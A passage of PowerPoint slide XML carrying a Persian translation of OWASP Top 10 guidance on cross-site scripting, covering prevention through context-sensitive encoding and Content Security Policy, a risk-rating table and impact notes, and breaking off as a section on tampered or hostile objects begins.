                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) آسیب پذیری های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ذخیره شده و منعکس شده را حل خواهد کرد. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>با استفاده از رمزگذاری حساس به متن هنگام تغییر سند مرورگر در سمت مشتری بر علیه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DOM XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> عمل می کند. هنگامی که از انجام این کار اجتناب نکنیم، تکنیک های فرار از حساسیت متن مشابه می توانند به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های مرورگر اعمال شوند، همانطور که در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'DOM based XSS Prevention' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> توضیح داده شده است. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>فعال کردن یک سیاست امنیتی محتوا (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) یک کنترل دفاع در عمق در برابر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> است. این مؤثر است اگر هیچ آسیب پذیری دیگری وجود نداشته باشد که اجازه می دهد کدهای مخرب را از طریق فایل محلی شامل شود (مثلا مسیرهای رونویسی شده یا کتابخانه های آسیب پذیر از شبکه های تحویل مجاز محتوا).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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pPr algn="ctr"/>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3798712276"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۳</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۳</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fa-IR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۲</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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ابزارهای خودکار می توانند تمام 3 شکل ممکن </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>را شناسایی و اکسپلویت کنند و</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> چارچوب های اکسپلویت در دسترس رایگانی وجود دارد. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>دومین مسئله مهم در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>است و در حدود دو سوم از تمام برنامه های کاربردی یافت می شود.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ابزارهای خودکار می توانند برخی از مشکلات </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>را به صورت خودکار، به ویژه در فن آوری های بالغ مانند </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>PHP، J2EE / JSP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ASP.NET </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>پیدا کنند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تأثیر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>برای بازتاب و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>DOM XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>متوسط است و برای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ذخیره شده با اجرای کد از راه دور در مرورگر قربانی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> شدید است </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مانند سرقت اعتبارها، جلسات و یا ارائه بد افزارها به قربانیان.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه های کاربردی و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها آسیب پذیر خواهند بود اگر آنها از اشیاء متخاصم یا دستکاری شده توسط مهاجم استفاده کنند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>این می تواند به دو نوع اصلی حملات منجر شود:</a:t>
            </a:r>
          </a:p>
          <a:p>
